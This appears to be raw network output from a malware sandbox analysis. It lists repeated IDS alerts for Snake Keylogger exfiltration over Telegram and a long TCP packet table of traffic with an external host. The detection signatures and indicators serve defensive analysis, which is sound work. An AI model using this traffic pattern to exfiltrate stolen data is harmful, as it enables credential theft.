                                                                                    2025-01-13T11:46:26.642896+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550012149.154.167.220443TCP
                                                                                    2025-01-13T11:46:26.943173+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550012149.154.167.220443TCP
                                                                                    2025-01-13T11:46:27.573142+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550013149.154.167.220443TCP
                                                                                    2025-01-13T11:46:27.848663+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550013149.154.167.220443TCP
                                                                                    2025-01-13T11:46:28.493494+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550014149.154.167.220443TCP
                                                                                    2025-01-13T11:46:28.781226+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550014149.154.167.220443TCP
                                                                                    2025-01-13T11:46:29.426365+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550015149.154.167.220443TCP
                                                                                    2025-01-13T11:46:29.725503+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550015149.154.167.220443TCP
                                                                                    2025-01-13T11:46:30.341952+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550016149.154.167.220443TCP
                                                                                    2025-01-13T11:46:30.634589+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550016149.154.167.220443TCP
                                                                                    2025-01-13T11:46:31.265421+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550017149.154.167.220443TCP
                                                                                    2025-01-13T11:46:31.580014+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550017149.154.167.220443TCP
                                                                                    2025-01-13T11:46:32.222111+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550018149.154.167.220443TCP
                                                                                    2025-01-13T11:46:32.514287+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550018149.154.167.220443TCP
                                                                                    2025-01-13T11:46:33.164037+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550019149.154.167.220443TCP
                                                                                    2025-01-13T11:46:33.483346+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550019149.154.167.220443TCP
                                                                                    2025-01-13T11:46:34.118980+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550020149.154.167.220443TCP
                                                                                    2025-01-13T11:46:34.420047+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550020149.154.167.220443TCP
                                                                                    2025-01-13T11:46:35.063786+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550021149.154.167.220443TCP
                                                                                    2025-01-13T11:46:35.371881+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550021149.154.167.220443TCP
                                                                                    2025-01-13T11:46:36.024707+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550022149.154.167.220443TCP
                                                                                    2025-01-13T11:46:36.337661+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550022149.154.167.220443TCP
                                                                                    2025-01-13T11:46:36.958165+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550023149.154.167.220443TCP
                                                                                    2025-01-13T11:46:37.352701+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550023149.154.167.220443TCP
                                                                                    2025-01-13T11:46:37.966482+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550024149.154.167.220443TCP
                                                                                    2025-01-13T11:46:38.266331+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550024149.154.167.220443TCP
                                                                                    2025-01-13T11:46:38.893251+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550025149.154.167.220443TCP
                                                                                    2025-01-13T11:46:39.405107+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550025149.154.167.220443TCP
                                                                                    2025-01-13T11:46:40.044138+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550026149.154.167.220443TCP
                                                                                    2025-01-13T11:46:40.334351+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550026149.154.167.220443TCP
                                                                                    2025-01-13T11:46:40.983891+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550027149.154.167.220443TCP
                                                                                    2025-01-13T11:46:41.290088+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550027149.154.167.220443TCP
                                                                                    2025-01-13T11:46:41.926174+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550028149.154.167.220443TCP
                                                                                    2025-01-13T11:46:42.197426+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550028149.154.167.220443TCP
                                                                                    2025-01-13T11:46:42.851220+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550029149.154.167.220443TCP
                                                                                    2025-01-13T11:46:43.162937+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550029149.154.167.220443TCP
                                                                                    2025-01-13T11:46:43.783614+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550030149.154.167.220443TCP
                                                                                    2025-01-13T11:46:44.091503+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550030149.154.167.220443TCP
                                                                                    2025-01-13T11:46:44.711930+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550031149.154.167.220443TCP
                                                                                    2025-01-13T11:46:45.070615+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550031149.154.167.220443TCP
                                                                                    2025-01-13T11:46:45.733557+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550032149.154.167.220443TCP
                                                                                    2025-01-13T11:46:46.028409+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550032149.154.167.220443TCP
                                                                                    2025-01-13T11:46:46.684863+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550033149.154.167.220443TCP
                                                                                    2025-01-13T11:46:47.001394+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550033149.154.167.220443TCP
                                                                                    2025-01-13T11:46:47.640931+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550034149.154.167.220443TCP
                                                                                    2025-01-13T11:46:47.955845+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550034149.154.167.220443TCP
                                                                                    2025-01-13T11:46:48.593660+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550035149.154.167.220443TCP
                                                                                    2025-01-13T11:46:48.921185+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550035149.154.167.220443TCP
                                                                                    2025-01-13T11:46:49.569581+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550036149.154.167.220443TCP
                                                                                    2025-01-13T11:46:50.061690+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550036149.154.167.220443TCP
                                                                                    2025-01-13T11:46:50.702090+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550037149.154.167.220443TCP
                                                                                    2025-01-13T11:46:51.160623+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550037149.154.167.220443TCP
                                                                                    2025-01-13T11:46:51.819628+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550038149.154.167.220443TCP
                                                                                    2025-01-13T11:46:52.173751+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550038149.154.167.220443TCP
                                                                                    2025-01-13T11:46:52.816853+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550039149.154.167.220443TCP
                                                                                    2025-01-13T11:46:53.219669+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550039149.154.167.220443TCP
                                                                                    2025-01-13T11:46:53.908147+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550040149.154.167.220443TCP
                                                                                    2025-01-13T11:46:54.196073+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550040149.154.167.220443TCP
                                                                                    2025-01-13T11:46:54.827171+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550041149.154.167.220443TCP
                                                                                    2025-01-13T11:46:55.187941+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550041149.154.167.220443TCP
                                                                                    2025-01-13T11:46:55.839898+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550042149.154.167.220443TCP
                                                                                    2025-01-13T11:46:56.193399+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550042149.154.167.220443TCP
                                                                                    2025-01-13T11:46:56.819382+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550043149.154.167.220443TCP
                                                                                    2025-01-13T11:46:57.252167+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550043149.154.167.220443TCP
                                                                                    2025-01-13T11:46:57.884010+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550044149.154.167.220443TCP
                                                                                    2025-01-13T11:46:58.246957+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550044149.154.167.220443TCP
                                                                                    2025-01-13T11:46:58.904663+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550045149.154.167.220443TCP
                                                                                    2025-01-13T11:46:59.339270+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550045149.154.167.220443TCP
                                                                                    2025-01-13T11:47:00.000501+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550046149.154.167.220443TCP
                                                                                    2025-01-13T11:47:00.494088+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550046149.154.167.220443TCP
                                                                                    2025-01-13T11:47:01.133445+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550047149.154.167.220443TCP
                                                                                    2025-01-13T11:47:01.510123+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550047149.154.167.220443TCP
                                                                                    2025-01-13T11:47:02.211760+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550048149.154.167.220443TCP
                                                                                    2025-01-13T11:47:02.585067+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550048149.154.167.220443TCP
                                                                                    2025-01-13T11:47:03.204098+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550049149.154.167.220443TCP
                                                                                    2025-01-13T11:47:03.648643+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550049149.154.167.220443TCP
                                                                                    2025-01-13T11:47:05.049141+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550050149.154.167.220443TCP
                                                                                    2025-01-13T11:47:05.466919+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550050149.154.167.220443TCP
                                                                                    2025-01-13T11:47:06.084137+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.550051149.154.167.220443TCP
                                                                                    2025-01-13T11:47:06.446508+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550051149.154.167.220443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 13, 2025 11:44:59.639729977 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:44:59.644854069 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:44:59.644943953 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:44:59.645564079 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:44:59.650367022 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.609076977 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.609118938 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.609154940 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.609189987 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.609222889 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.609256029 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.609299898 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:00.609342098 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:00.860188961 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.860227108 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.860263109 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.860297918 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.860332966 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.860335112 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:00.860371113 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:00.860614061 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.860649109 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.860685110 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:00.860922098 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.860955954 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.860979080 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:00.860991001 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:00.861095905 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.116378069 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.116424084 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.116439104 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.116455078 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.116636038 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.116715908 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.116766930 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.116801977 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.116835117 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.116848946 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.116868019 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.116885900 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.117516994 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.117567062 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.117568970 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.117603064 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.117644072 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.117656946 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.117691994 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.117753983 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.118283987 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.118319035 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.118377924 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.206927061 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.247082949 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.367597103 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.367638111 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.367675066 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.367696047 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.367710114 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.367767096 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.367851019 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.367886066 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.367919922 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.367937088 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.367969036 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.368001938 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.368016958 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.368561029 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.368613005 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.368618011 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.368660927 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.368678093 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.368691921 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.368706942 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.368716002 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.368772030 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.369456053 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.369507074 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.369510889 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.369576931 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.369611025 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.369626045 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.369646072 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.369679928 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.369693995 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.370405912 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.370439053 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.370459080 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.370474100 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.370506048 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.370520115 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.370541096 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.370574951 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.370590925 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.371184111 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.371237993 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.618736029 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.618755102 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.618771076 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.618786097 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.618824959 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.618841887 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.618899107 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.618913889 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.618927002 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619000912 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.619000912 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.619000912 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.619193077 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619208097 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619230986 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619247913 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619256973 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619261980 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.619293928 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.619697094 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619713068 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619728088 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619745970 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619749069 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.619762897 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619772911 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.619780064 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619831085 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.619874954 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619890928 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619906902 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.619924068 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.619952917 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.620646954 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.620662928 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.620677948 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.620711088 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.620721102 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.620748997 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.620764971 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.620789051 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.620795965 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.620804071 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.620820999 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.620822906 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.620855093 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.621604919 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.621620893 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.621635914 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.621650934 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.621660948 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.621665955 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.621681929 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.621682882 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.621714115 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.669040918 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.709177017 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.762711048 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.869911909 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.869944096 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.869997025 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870022058 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870033979 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870068073 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870084047 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870102882 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870142937 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870155096 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870225906 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870277882 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870277882 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870331049 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870363951 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870382071 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870399952 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870465994 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870579958 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870615005 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870666981 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870685101 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870702982 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870737076 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870753050 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870769978 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870820045 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870820999 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870855093 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870939016 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.870954990 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.870974064 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871028900 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.871357918 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871411085 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871445894 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871465921 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.871479034 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871530056 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871531963 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.871565104 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871601105 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871612072 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.871634960 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871669054 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871684074 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.871702909 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871737003 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871752024 CET4970480192.168.2.5160.22.121.182
                                                                                    Jan 13, 2025 11:45:01.871773005 CET8049704160.22.121.182192.168.2.5
                                                                                    Jan 13, 2025 11:45:01.871814013 CET4970480192.168.2.5160.22.121.182
